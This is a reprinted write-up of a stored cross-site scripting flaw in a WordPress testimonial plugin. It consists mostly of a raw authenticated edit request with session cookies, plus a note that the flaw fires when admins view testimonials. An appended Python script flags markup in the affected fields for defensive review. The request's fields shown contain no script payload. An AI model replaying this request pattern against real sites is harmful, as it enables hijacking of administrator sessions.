/*
Original article. When reprinting, please credit the source:
https://www.wpon.cn.11294.html
By xiarou page
*/
POST /wp-admin/post.php?post=176&action=edit&meta-box-loader=1&meta-box-loader-nonce=ee114d2173&_locale=user HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/post.php?post=176&action=edit
X-WP-Nonce: c12330b50c
Content-Type: multipart/form-data; boundary=---------------------------1097171016543246544154165286
Origin: http://example.com
Content-Length: 2729
DNT: 1
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7Ce020133190b2d0d55659fc79576f7341774c77f301b6096023e70f294549d103; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7C8642c6873c0009beb211174d3e93ed720f7d9826d71438fc48ac16ea7e999a66; wp-settings-3=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt; wp-settings-time-3=1588910767

-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wpnonce"

c627da8fa4
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/post.php?post=176&action=edit
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="user_ID"

3
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="action"

editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="originalaction"

editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_type"

testimonial
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="original_post_status"

publish
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="referredby"

http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_original_http_referer"

http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_ID"

176
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="meta-box-order-nonce"

e78bbacfea
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="closedpostboxesnonce"

cb99c6138d
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="samplepermalinknonce"

97e0ac6960
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="my-custom-fields_wpnonce"

f842632466
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_client"

-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_email"

test@gmail.com
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_position"

-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_other"

-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_rating"

-----------------------------1097171016543246544154165286--

#XSS TRIGGER POINT:
When an admin or authenticated user loads the contents of all testimonials.
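
A defender's view of the request above, as an added example that is not part of the original write-up: it parses a multipart `editpost` body and lists the `_ikcf_*` testimonial fields whose values contain markup characters, so they can be reviewed before the testimonial list renders them. The field names, `action` and `post_type` values come from the request on this page; the boundary, the sample values and the plain-text heuristic are assumptions constructed for the example.

```python
import re
from email import message_from_bytes

# Custom-field names as they appear in the request on this page.
IKCF_FIELDS = ("_ikcf_client", "_ikcf_email", "_ikcf_position",
               "_ikcf_other", "_ikcf_rating")
# Heuristic (assumption): these fields hold plain text, so < > " are suspect.
MARKUP = re.compile(r'[<>"]')

def parse_form(content_type, body):
    """Return {field name: value} for a multipart/form-data body."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = message_from_bytes(raw)
    if not msg.is_multipart():          # boundary missing or not found
        return {}
    form = {}
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        if name:
            form[name] = data.decode("utf-8", "replace").strip()
    return form

def flag_testimonial_edit(content_type, body):
    """List (field, value) pairs with markup in a testimonial editpost."""
    form = parse_form(content_type, body)
    if form.get("action") != "editpost" or form.get("post_type") != "testimonial":
        return []
    return [(f, form[f]) for f in IKCF_FIELDS if MARKUP.search(form.get(f, ""))]

# Constructed sample input (not captured traffic).
BOUNDARY = "constructedboundary1234"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY

def sample_body(fields):
    parts = "".join(
        f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
        for k, v in fields.items())
    return (parts + f"--{BOUNDARY}--\r\n").encode()

if __name__ == "__main__":
    body = sample_body({"action": "editpost", "post_type": "testimonial",
                        "_ikcf_client": "<b>Jane</b>",
                        "_ikcf_email": "test@gmail.com", "_ikcf_position": ""})
    for field, value in flag_testimonial_edit(CONTENT_TYPE, body):
        print(f"review: {field} = {value!r}")
```

A flagged field is a prompt for review, not proof of abuse; the durable fix is escaping these values wherever the testimonial list outputs them.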